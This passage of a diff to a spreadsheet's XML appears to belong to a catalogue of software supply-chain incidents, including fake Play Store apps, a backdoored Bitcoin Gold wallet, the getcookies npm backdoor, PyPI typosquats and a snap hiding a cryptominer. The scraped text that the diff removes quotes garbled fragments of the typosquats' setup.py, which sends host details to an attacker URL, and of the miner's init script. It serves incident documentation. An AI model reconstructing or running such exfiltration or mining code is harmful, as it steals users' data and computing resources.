'proton', 'malware', 'osxprotonc', 'proton', 'investigation', 'date', 'newsletter', 'regular', 'weekly', 'newsletter', 'subscribe', 'article', 'research', 'rescom', 'ride', 'wave', 'rescom', 'ride', 'wave', 'evasive', 'panda', 'leverage', 'research', 'evasive', 'panda', 'leverage', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'share', 'article', 'discussion', 'news', 'view', 'insight', 'privacy', 'policy', 'legal', 'information', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -1911,15 +1687,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C57" t="inlineStr"/>
+      <c r="C57" t="inlineStr">
+        <is>
+          <t>Fake versions of Whatsapp were available within the Google Play Store and appeared to be signed by Whatsapp.</t>
+        </is>
+      </c>
       <c r="D57" t="inlineStr">
         <is>
           <t>https://www.theregister.com/2017/11/03/fake_whatsapp_app/</t>
-        </is>
-      </c>
-      <c r="E57" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1936,17 +1711,12 @@
       </c>
       <c r="C58" t="inlineStr">
         <is>
-          <t>skip main content open menu open navigation reddit home randroid chip close button reddit reddit expand user menu open settings menu sign advertise reddit shop collectible avatars reddit scan code download check stores</t>
+          <t>A fake version of a Whatsapp updater was available within the Google Play Store and appeared to be signed by Whatsapp.</t>
         </is>
       </c>
       <c r="D58" t="inlineStr">
         <is>
           <t>https://www.reddit.com/r/Android/comments/7ahujw/psa_two_different_developers_under_the_same_name/dpa4ste/?st=j9nvw7rx&amp;sh=d9977b20</t>
-        </is>
-      </c>
-      <c r="E58" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'open', 'menu', 'open', 'navigation', 'reddit', 'home', 'chip', 'close', 'button', 'reddit', 'reddit', 'user', 'menu', 'open', 'setting', 'menu', 'sign', 'reddit', 'shop', 'collectible', 'avatar', 'download', 'store']</t>
         </is>
       </c>
     </row>
@@ -1963,17 +1733,12 @@
       </c>
       <c r="C59" t="inlineStr">
         <is>
-          <t>browser longer supported please switch supported browser continue using twittercom list supported browsers help center help center terms service privacy policy cookie policy imprint info corp</t>
+          <t>Fake versions of Whatsapp were available within the Google Play Store and appeared to be signed by Whatsapp.</t>
         </is>
       </c>
       <c r="D59" t="inlineStr">
         <is>
           <t>https://twitter.com/virqdroid/status/927239025953566726</t>
-        </is>
-      </c>
-      <c r="E59" t="inlineStr">
-        <is>
-          <t>['browser', 'list', 'browser', 'center', 'center', 'term', 'service', 'privacy', 'policy', 'cookie', 'policy', 'imprint']</t>
         </is>
       </c>
     </row>
@@ -1990,17 +1755,12 @@
       </c>
       <c r="C60" t="inlineStr">
         <is>
-          <t>skip main content microsoft microsoft teams copilot windows surface xbox deals small business support microsoft office windows surface xbox deals support software windows apps onedrive outlook skype onenote microsoft teams microsoft edge devices computers shop xbox accessories mixed reality phones entertainment xbox game pass ultimate xbox live gold xbox games games windows digital games movies business microsoft azure microsoft dynamics microsoft microsoft industry data platform microsoft advertising licensing shop business developer visual studio windows server windows center docs microsoft rewards free downloads education store locations gift cards view sitemap search search microsoftcom cancel current useragent string appears automated process incorrect please click link united states english microsoft homepage whats surface laptop studio surface laptop surface surface laptop microsoft copilot copilot windows microsoft windows apps microsoft store account profile download center microsoft store support returns order tracking certified refurbished microsoft store promise flexible payments education microsoft education devices education microsoft teams education microsoft education school educator training development deals students parents azure students business microsoft cloud microsoft dynamics microsoft microsoft power platform microsoft teams copilot microsoft small business developer azure developer center documentation microsoft learn microsoft tech community azure marketplace appsource visual studio company careers microsoft company news privacy microsoft investors diversity inclusion accessibility sustainability english united states sitemap contact microsoft privacy terms trademarks safety recycling microsoft</t>
+          <t>Another instance of the BankBot trojan was identified within an app on the Google Play Store.</t>
         </is>
       </c>
       <c r="D60" t="inlineStr">
         <is>
           <t>https://www.riskiq.com/blog/labs/mobile-bankbot/</t>
-        </is>
-      </c>
-      <c r="E60" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'small', 'business', 'support', 'deal', 'support', 'software', 'window', 'app', 'outlook', 'device', 'computer', 'accessory', 'mixed', 'reality', 'phone', 'game', 'game', 'digital', 'game', 'movie', 'platform', 'licensing', 'shop', 'business', 'developer', 'visual', 'studio', 'free', 'download', 'education', 'store', 'location', 'gift', 'card', 'sitemap', 'search', 'search', 'current', 'useragent', 'string', 'automated', 'process', 'incorrect', 'homepage', 'surface', 'laptop', 'studio', 'surface', 'laptop', 'surface', 'surface', 'copilot', 'app', 'store', 'account', 'profile', 'center', 'support', 'return', 'order', 'tracking', 'store', 'flexible', 'payment', 'education', 'device', 'school', 'educator', 'training', 'development', 'deal', 'student', 'parent', 'student', 'small', 'business', 'developer', 'azure', 'developer', 'center', 'documentation', 'azure', 'marketplace', 'appsource', 'visual', 'studio', 'company', 'news', 'privacy', 'inclusion', 'accessibility', 'sustainability', 'contact', 'term', 'safety']</t>
         </is>
       </c>
     </row>
@@ -2017,17 +1777,12 @@
       </c>
       <c r="C61" t="inlineStr">
         <is>
-          <t>bitcoin gold users miners developers ecosystem team btgpay btgpay btgpay ecommerce technology explorer electrumg core wallet v0173 github ccbn network status press blog press community ambassadors forum discord github facebook twitter medium reddit youtube telegram select page critical warning edward iskra announcements updates updated sunday december published results detailed analysis suspicious file including list vulnerable wallets created file please detailed post vulnerable wallets suspicious file original post follows updated sunday november note expanded recall window windows wallet installer carefully note expanded timesdates indicated files currently available github site correct always check sha256 checksum downloaded files please aware approximately days link download page file downloads github release page serving suspicious files unknown origin know otherwise users presume files created malicious intent steal cryptocurrencies andor user information file trigger antivirus antimalware software presume file safe user verified sha256 checksum download checksum listed download pages already aware file authentic used file nobody assume users take important step anyone downloaded windows wallet file november november file file used computer used addressed extreme caution file deleted machine thoroughly checked malware viruses wiped clean cryptocurrencies wallets accessible machine moved wallet addresses immediately currently posted files safe users always confirm downloaded files sha256 checksum relevant pages links project github repository httpsgithubcombtcgpubtcgpureleasestag01501 project download page httpsbitcoingoldorgdownloads windows file download sha256 53e01dd7366e87fb920645b29541f8487f6f9eec233cbb43032c60c0398fc9fa bitcoingold0150win64setupexe linux file download sha256 hash sha256 25d7bf0deb125ecf5b50925a1c58e98c4b0b0a524470379c952f6b9310e97cfe bitcoingold0150x8664pclinuxgnuzip additional details update sunday november corrected recall window windows installer file expanded different suspicious files uploaded github course several days neither file matched publicly posted sha256 checksum users worked suspicious files advised take safest possible course action engage knowledgeable professionals assist text unchanged investigating suspicious files fully links download page point github repository project standard practice associate source code compiled files unknown party gained access github repository replaced compiled windows file different file closely analyzed know intent know file immediately trigger antivirustrojan warnings linux file changed github repo secured believe second attempt possible suspicious file already replaced known safe file whose checksum matches team performing audit ensure safety systems attempt ascertain purpose file source code unchanged user downloaded source code compile unaffected best practice suggests ensure local repository matches current github repo exercise extreme caution search recent posts roadmap phala network partners bitcoin gold things brewing core wallet v0173 archives april march august july march september august january december november september august july june march february january december november october categories announcements development general press release progress update technical updates rights reserved bitcoin gold</t>
+          <t>A backdoored version of Bitcoin wallet was planted by the attackers who gained access to the GitHub repository. As a result, those users who downloaded the infected version instead of the official one might have lost their private keys if they created new wallets using this malicious software.</t>
         </is>
       </c>
       <c r="D61" t="inlineStr">
         <is>
           <t>https://bitcoingold.org/critical-warning-nov-26/</t>
-        </is>
-      </c>
-      <c r="E61" t="inlineStr">
-        <is>
-          <t>['bitcoin', 'gold', 'user', 'miner', 'developer', 'ecosystem', 'team', 'explorer', 'network', 'status', 'press', 'blog', 'press', 'community', 'ambassador', 'forum', 'discord', 'medium', 'telegram', 'select', 'page', 'critical', 'warning', 'update', 'result', 'analysis', 'suspicious', 'file', 'list', 'vulnerable', 'wallet', 'file', 'detailed', 'post', 'vulnerable', 'wallet', 'suspicious', 'file', 'original', 'post', 'note', 'window', 'window', 'wallet', 'note', 'timesdate', 'file', 'available', 'site', 'correct', 'checksum', 'file', 'aware', 'day', 'link', 'download', 'page', 'file', 'page', 'suspicious', 'file', 'unknown', 'origin', 'user', 'file', 'malicious', 'intent', 'cryptocurrencie', 'andor', 'user', 'information', 'file', 'trigger', 'antimalware', 'software', 'presume', 'file', 'safe', 'user', 'download', 'checksum', 'download', 'page', 'aware', 'file', 'authentic', 'file', 'user', 'important', 'step', 'window', 'file', 'file', 'file', 'computer', 'extreme', 'caution', 'file', 'machine', 'malware', 'virus', 'clean', 'cryptocurrencie', 'wallet', 'accessible', 'machine', 'wallet', 'address', 'file', 'safe', 'user', 'file', 'relevant', 'page', 'link', 'project', 'repository', 'project', 'download', 'page', 'additional', 'detail', 'update', 'window', 'window', 'file', 'different', 'suspicious', 'file', 'several', 'day', 'file', 'checksum', 'user', 'suspicious', 'file', 'safe', 'possible', 'course', 'action', 'knowledgeable', 'professional', 'text', 'unchanged', 'suspicious', 'file', 'download', 'page', 'point', 'project', 'standard', 'practice', 'associate', 'source', 'code', 'file', 'unknown', 'party', 'access', 'window', 'different', 'file', 'know', 'intent', 'know', 'file', 'antivirustrojan', 'file', 'believe', 'second', 'attempt', 'possible', 'suspicious', 'file', 'safe', 'file', 'checksum', 'team', 'audit', 'safety', 'system', 'attempt', 'purpose', 'file', 'source', 'code', 'unchanged', 'user', 'source', 'code', 'compile', 'unaffected', 'good', 'practice', 'local', 'repository', 'current', 'exercise', 'extreme', 'caution', 'search', 'recent', 'post', 'phala', 'network', 'partner', 'bitcoin', 'gold', 'thing', 'brewing', 'core', 'wallet', 'archive', 'category', 'announcement', 'development', 'general', 'press', 'release', 'progress', 'technical', 'update', 'right', 'bitcoin', 'gold']</t>
         </is>
       </c>
     </row>
@@ -2042,15 +1797,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C62" t="inlineStr"/>
+      <c r="C62" t="inlineStr">
+        <is>
+          <t>At least 3 highly rated games were available on Google Play that included an additional implant, the games had up to 10.5 million downloads when their nefarious behavior was exposed.</t>
+        </is>
+      </c>
       <c r="D62" t="inlineStr">
         <is>
           <t>https://www.securityweek.com/golduck-malware-infects-classic-android-games</t>
-        </is>
-      </c>
-      <c r="E62" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2065,15 +1819,14 @@
           <t>Chrome Web Store</t>
         </is>
       </c>
-      <c r="C63" t="inlineStr"/>
+      <c r="C63" t="inlineStr">
+        <is>
+          <t>Researchers discover scores of malicious Chrome extensions creating Droidclub botnet</t>
+        </is>
+      </c>
       <c r="D63" t="inlineStr">
         <is>
           <t>https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-chrome-extensions-found-chrome-web-store-form-droidclub-botnet</t>
-        </is>
-      </c>
-      <c r="E63" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2090,17 +1843,12 @@
       </c>
       <c r="C64" t="inlineStr">
         <is>
-          <t>skip main content microsoft microsoft teams copilot windows surface xbox deals small business support microsoft office windows surface xbox deals support software windows apps onedrive outlook skype onenote microsoft teams microsoft edge devices computers shop xbox accessories mixed reality phones entertainment xbox game pass ultimate xbox live gold xbox games games windows digital games movies business microsoft azure microsoft dynamics microsoft microsoft industry data platform microsoft advertising licensing shop business developer visual studio windows server windows center docs microsoft rewards free downloads education store locations gift cards view sitemap search search microsoftcom cancel current useragent string appears automated process incorrect please click link united states english microsoft homepage whats surface laptop studio surface laptop surface surface laptop microsoft copilot copilot windows microsoft windows apps microsoft store account profile download center microsoft store support returns order tracking certified refurbished microsoft store promise flexible payments education microsoft education devices education microsoft teams education microsoft education school educator training development deals students parents azure students business microsoft cloud microsoft dynamics microsoft microsoft power platform microsoft teams copilot microsoft small business developer azure developer center documentation microsoft learn microsoft tech community azure marketplace appsource visual studio company careers microsoft company news privacy microsoft investors diversity inclusion accessibility sustainability english united states sitemap contact microsoft privacy terms trademarks safety recycling microsoft</t>
+          <t>Attackers performed an update poisoning campaign that installed a trojanized version of MediaGet on computers, and then downloaded a cryptominer using the backdoored version.</t>
         </is>
       </c>
       <c r="D64" t="inlineStr">
         <is>
           <t>https://www.microsoft.com/security/blog/2018/03/13/poisoned-peer-to-peer-app-kicked-off-dofoil-coin-miner-outbreak/</t>
-        </is>
-      </c>
-      <c r="E64" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'small', 'business', 'support', 'deal', 'support', 'software', 'window', 'app', 'outlook', 'device', 'computer', 'accessory', 'mixed', 'reality', 'phone', 'game', 'game', 'digital', 'game', 'movie', 'platform', 'licensing', 'shop', 'business', 'developer', 'visual', 'studio', 'free', 'download', 'education', 'store', 'location', 'gift', 'card', 'sitemap', 'search', 'search', 'current', 'useragent', 'string', 'automated', 'process', 'incorrect', 'homepage', 'surface', 'laptop', 'studio', 'surface', 'laptop', 'surface', 'surface', 'copilot', 'app', 'store', 'account', 'profile', 'center', 'support', 'return', 'order', 'tracking', 'store', 'flexible', 'payment', 'education', 'device', 'school', 'educator', 'training', 'development', 'deal', 'student', 'parent', 'student', 'small', 'business', 'developer', 'azure', 'developer', 'center', 'documentation', 'azure', 'marketplace', 'appsource', 'visual', 'studio', 'company', 'news', 'privacy', 'inclusion', 'accessibility', 'sustainability', 'contact', 'term', 'safety']</t>
         </is>
       </c>
     </row>
@@ -2117,17 +1865,12 @@
       </c>
       <c r="C65" t="inlineStr">
         <is>
-          <t>blog archive npmjscom status support blog discontinued updates team published github blog github changelog reported malicious module getcookies early team received responded reports package masqueraded cookie parsing library contained malicious backdoor result investigation concluded three packages three versions fourth package unpublished registry packages published registry used malicious modules would allowed backdoor triggered applications published registry directly required malicious modules might vulnerable scope analysis initial report initial information community reported package getcookies contained potential backdoor expresscookies httpfetchcookies depended upon getcookies popular package mailparser depended upon httpfetchcookies triage upon receiving report npm’s team started triage goal triage determining whether reported package fact contain malicious code impacted community won’t disclose entire backdoor we’ll give highlights noted reviewed backdoor worked parsing usersupplied http requestheaders looking specifically formatted data provides three different commands backdoor jsonstringifyreqheadersreplacegaf094haf092igi headers stringified result searched values format gcommandhdatai control flow codes available 0xfffe—reset code buffer 0xfffa—execute code located buffer calling vmruninthiscontext providing moduleexports require next arguments default—load remote code memory execution control codes allowed attacker input arbitrary code running server execute beyond backdoor code aspects modules account also stood based reverse image search profile image user published getcookies appeared stock photo github user linked packages created march download counts spiked weeks getcookies expresscookies httpfetchcookies seems correlate version mailparser published depended upon httpfetchcookie mailparser httpfetchcookies expresscookies └──getcookies dependency relationship reported modules despite deprecated mailparser still receives weekly downloads searched users module might impacted determined published versions mailparser depended httpfetchcookies module eliminating risk backdoor posed speculate mailparser’s requiring httpfetchcookies execute attack future inflate download counts expresscookies legitimacy ultimately mailparser users weren’t impacted users directly required used expresscookies getcookies packages would impacted actions took removed dustin87 user unpublished getcookies expresscookies httpfetchcookies removed versions mailparser depended httpfetchcookies module reset tokens author mailparser prevent unauthorized publishes timeline times pacific daylight time utc–7 0523—initial community report 0541—security team started triage 0701—unpublished getcookies expresscookies httpfetchcookies 0702—revoked tokens mailparser maintainer 0726—unpublished mailparser versions 347pm adamnpm javascript</t>
+          <t>The getcookies npm package contained a potential backdoor, and was introduced as a dependency to several packages, including the popular package mailparser.</t>
         </is>
       </c>
       <c r="D65" t="inlineStr">
         <is>
           <t>https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies</t>
-        </is>
-      </c>
-      <c r="E65" t="inlineStr">
-        <is>
-          <t>['blog', 'archive', 'status', 'support', 'blog', 'update', 'team', 'malicious', 'module', 'getcookie', 'early', 'team', 'report', 'package', 'cookie', 'library', 'malicious', 'backdoor', 'result', 'investigation', 'package', 'version', 'fourth', 'package', 'registry', 'package', 'registry', 'malicious', 'module', 'backdoor', 'application', 'registry', 'malicious', 'module', 'vulnerable', 'scope', 'analysis', 'initial', 'report', 'initial', 'information', 'community', 'package', 'getcookie', 'potential', 'backdoor', 'httpfetchcookie', 'getcookie', 'popular', 'package', 'mailparser', 'httpfetchcookie', 'triage', 'report', 'team', 'triage', 'goal', 'triage', 'package', 'fact', 'malicious', 'code', 'community', 'entire', 'backdoor', 'highlight', 'backdoor', 'usersupplied', 'http', 'requestheader', 'datum', 'different', 'command', 'backdoor', 'header', 'result', 'value', 'format', 'gcommandhdatai', 'control', 'flow', 'code', 'available', 'code', 'buffer', 'code', 'buffer', 'vmruninthiscontext', 'moduleexport', 'next', 'argument', 'default', 'load', 'remote', 'code', 'memory', 'execution', 'control', 'code', 'attacker', 'input', 'arbitrary', 'code', 'server', 'backdoor', 'code', 'aspect', 'module', 'account', 'reverse', 'image', 'search', 'profile', 'image', 'user', 'getcookie', 'stock', 'photo', 'user', 'package', 'download', 'spiked', 'week', 'getcookie', 'expresscookie', 'httpfetchcookie', 'correlate', 'version', 'mailparser', 'getcookie', 'dependency', 'relationship', 'module', 'mailparser', 'weekly', 'download', 'user', 'module', 'determined', 'version', 'httpfetchcookie', 'module', 'risk', 'backdoor', 'mailparser', 'httpfetchcookie', 'attack', 'future', 'inflate', 'download', 'expresscookie', 'mailparser', 'user', 'user', 'expresscookie', 'getcookie', 'package', 'action', 'dustin87', 'user', 'unpublished', 'getcookie', 'expresscookie', 'httpfetchcookie', 'version', 'httpfetchcookie', 'module', 'reset', 'token', 'author', 'unauthorized', 'publishe', 'timeline', 'time', 'pacific', 'daylight', 'time', 'initial', 'community', 'report', 'security', 'team', 'triage', 'unpublished', 'getcookie', 'httpfetchcookie', 'token', 'unpublished', 'mailparser', 'version']</t>
         </is>
       </c>
     </row>
@@ -2144,17 +1887,12 @@
       </c>
       <c r="C66" t="inlineStr">
         <is>
-          <t>verifying browser redirecting next page automatically redirected blogradwarecom shortly incident d10230c3bsff483aa8cb778284f5c2b4 protected radware</t>
+          <t>This malware campaign is propagating via socially-engineered links on Facebook and is infecting users by abusing a Chrome Web Store application (Nigelify) that performs credential theft, cryptomining, click fraud and more.</t>
         </is>
       </c>
       <c r="D66" t="inlineStr">
         <is>
           <t>https://blog.radware.com/security/2018/05/nigelthorn-malware-abuses-chrome-extensions/</t>
-        </is>
-      </c>
-      <c r="E66" t="inlineStr">
-        <is>
-          <t>['next', 'page', 'incident', 'd10230c3bsff483aa8cb778284f5c2b4', 'radware']</t>
         </is>
       </c>
     </row>
@@ -2171,17 +1909,12 @@
       </c>
       <c r="C67" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert pypi warehouse public notifications fork star code issues pull requests actions projects insights additional navigation options code issues pull requests actions projects insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom malware packages pypi closed opened issue comments closed malware packages pypi opened issue comments comments copy link commented projects steal user information install pyymal pysprak libhtml5 libcurl pythonmysql mateplotlib numipy openvc text updated successfully errors encountered reactions changed title report malware package pypi malware packages pypi copy link member ewdurbin commented thanks report please consider submitting published policy future reviewing reactions sorry something went wrong copy link member ewdurbin commented following packages removed typosquatting policy user destroyed libcurl libhtml5 mateplotlib nmappython numipy openvc pysprak pythonmongo pythonmysql pythonopenssl pyymal reactions sorry something went wrong ewdurbin closed completed copy link member ewdurbin commented malicious setuppy contents packages removed checkversion username getpass getuser hostname socket gethostname osversion platform platform platform system windows import ctypes import locale dllhandle ctypes windll kernel32 loclang locale getdefaultlocale language join loclang elif platform system linux loclang popen echo lang language loclang connect getsockname close socket socket socket afinet socket sockdgram package pysprak username hostname osversion package versioninfo request urlopen rhttpnumipyopenvcorgsparkphp data encode utf8 base64 b64encode encode utf8 elif versioninfo urllib urlopen rhttpnumipyopenvcorgsparkphp base64 encodestring checkversion reactions sorry something went wrong copy link contributor pradyunsg commented edited ewdurbin maybe issue template named securitymalware report whose contents tell user submit according policy instead would helpful alichtman honglei josix reacted thumbs emoji reactions reactions sorry something went wrong sign free join conversation github already account sign comment assignees assigned labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>10 instances of typosquatting attacks that collect and exfiltrate host information were identified.</t>
         </is>
       </c>
       <c r="D67" t="inlineStr">
         <is>
           <t>https://github.com/pypa/warehouse/issues/3948</t>
-        </is>
-      </c>
-      <c r="E67" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'pypi', 'warehouse', 'public', 'notification', 'star', 'issue', 'request', 'action', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'malware', 'package', 'issue', 'comment', 'malware', 'package', 'issue', 'comment', 'comment', 'link', 'project', 'user', 'information', 'numipy', 'openvc', 'text', 'error', 'reaction', 'title', 'report', 'package', 'member', 'thank', 'report', 'policy', 'future', 'reviewing', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'package', 'policy', 'user', 'pyymal', 'reaction', 'wrong', 'copy', 'link', 'member', 'malicious', 'setuppy', 'content', 'package', 'checkversion', 'username', 'platform', 'platform', 'platform', 'system', 'window', 'import', 'ctype', 'import', 'locale', 'dllhandle', 'ctype', 'platform', 'close', 'socket', 'socket', 'socket', 'hostname', 'package', 'request', 'urlopen', 'datum', 'encode', 'base64', 'encode', 'urllib', 'urlopen', 'base64', 'checkversion', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'template', 'securitymalware', 'report', 'content', 'user', 'submit', 'policy', 'helpful', 'alichtman', 'reaction', 'reaction', 'sorry', 'wrong', 'sign', 'free', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -2198,17 +1931,12 @@
       </c>
       <c r="C68" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert canonical snapcraftio public notifications fork star code issues pull requests actions projects insights additional navigation options code issues pull requests actions projects insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom application reasons closed tarwirdur opened issue comments closed application reasons tarwirdur opened issue comments assignees comments copy link tarwirdur commented edited application contains hidden сryptocurrency miner inside squashfsrootsystemd miner squashfsrootstart init script binbash currencybcn name2048buntu snapnamecurrentsystemd myfirstferrariprotonmailcom currency catch coresgrep processor proccpuinfo cores snapnamecurrentsystemd myfirstferrariprotonmailcom currency else snapnamecurrentsystemd myfirstferrariprotonmailcom currency find complain application good text updated successfully errors encountered zawertun lexsav7 prateekgoyal18 a1batross kron4ek starvald vadi2 nipperv christianpiper shelt reacted thumbs emoji tim77 enerccio enyone gasinvein deikatsuo chalker timi7007 thehlopster ma24th reacted laugh emoji reactions reactions reactions copy link mathe30 commented send message email says tonyjosi j3ky reacted confused emoji reactions reactions sorry something went wrong copy link mathe30 commented know dirty secrity remove application gonna send public know cheap bitch xaizek eddydarell stoat1 isaacjt heavyelement reacted thumbs emoji tim77 brews rtheren xdevelnet tonyjosi dittoslash codingkoopa basixkor justasmalinauskas j3ky reacted laugh emoji reactions reactions reactions sorry something went wrong sparkiegeek selfassigned copy link contributor sparkiegeek commented thanks report removing store whilst investigate freistyle owais mcatanzaro enyone tdemin cyd0n1a dominichayesferen ads20000 noromanba timi7007 reacted thumbs emoji mathe30 kron4ek tarwirdur antoniond brews owais itiswednesday tdemin sebt3 cyd0n1a reacted hooray emoji reactions reactions reactions sorry something went wrong copy link author tarwirdur commented edited sparkiegeek note application author contains miner checked 2048buntu hextris suppose contains already deleted thank sparkiegeek kron4ek mcataford noromanba roshimon arg0s1080 timi7007 jinzulen reacted thumbs emoji reactions reactions sorry something went wrong copy link contributor sparkiegeek commented tarwirdur weve removed applications author pending investigations thank vigilance antoniond ls1n owais popey smt923 vdragon enyone tdemin phocean dominichayesferen reacted hooray emoji reactions reactions sorry something went wrong sparkiegeek closed completed copy link enerccio commented poor ferrari thomas15v actionless sm4rk0 thgros reacted thumbs emoji jriwanek steelbrain sixpetrov reacted thumbs emoji vdragon tdemin dominichayesferen mcataford nmikhailov stevetodorov thomas15v rphsoftware vitalkanev marcosfrm reacted laugh emoji reactions reactions reactions reactions sorry something went wrong copy link tdemin commented enerccio whats point poor getting ferrari a1batross scarletlovell mcataford nmikhailov cambazz ksyz reacted thumbs emoji reactions reactions sorry something went wrong copy link oliwarner commented plans push fake package update forcibly uninstalls crap games647 antoniond ads20000 keithzg mcataford pumpkinlink jriwanek nmikhailov oikonomopo reacted thumbs emoji reactions reactions sorry something went wrong copy link ads20000 commented future reference store category snapcraft forum probably best place store removal pretty much snappy developers watch forum pretty regularly youd possibly even swifter response also started topic asking action taken make less likely happen future reactions sorry something went wrong copy link rliden commented still post reactions sorry something went wrong copy link author tarwirdur commented still post rliden cured replaced cured version victims computers automatically updated cured version snap quarantine snapquarantine application author reactions sorry something went wrong copy link ghost commented image manipulations program gimp snapcrafters another application virus still ubuntu store careful install gimp find theyre trick prevent people commenting rating ubuntu store prevents people knowing virus brlintw reacted thumbs emoji reactions reaction sorry something went wrong copy link ads20000 commented ultrafractal substantiate claim find unlikely gimp httpsgithubcomsnapcrafters crypto miner snapcrafters github repo snapcrafters store account aware canonical employees write access canonical would culpable claim correct prove gimp snapcrafters crypto miner please provide evidence brlintw reacted thumbs emoji reactions reaction sorry something went wrong lrvick referenced issue npmcli supply chain attacks hard enough 5a3b345 timbmachine mentioned issue intel httpsgithubcomcanonicalwebsitessnapcraftioissues651 timbmachinelinuxmalware296 open sign free join conversation github already account sign comment assignees sparkiegeek labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>The app 2048buntu and another app by the same author contained a cryptocurrency mining application disguised as the systemd daemon, along with an init script that provided boot persistence.</t>
         </is>
       </c>
       <c r="D68" t="inlineStr">
         <is>
           <t>https://github.com/canonical-web-and-design/snapcraft.io/issues/651</t>
-        </is>
-      </c>
-      <c r="E68" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'canonical', 'snapcraftio', 'public', 'notification', 'star', 'issue', 'request', 'action', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'application', 'reason', 'issue', 'comment', 'application', 'reason', 'issue', 'comment', 'comment', 'copy', 'link', 'edited', 'application', 'сryptocurrency', 'miner', 'squashfsrootsystemd', 'currency', 'currency', 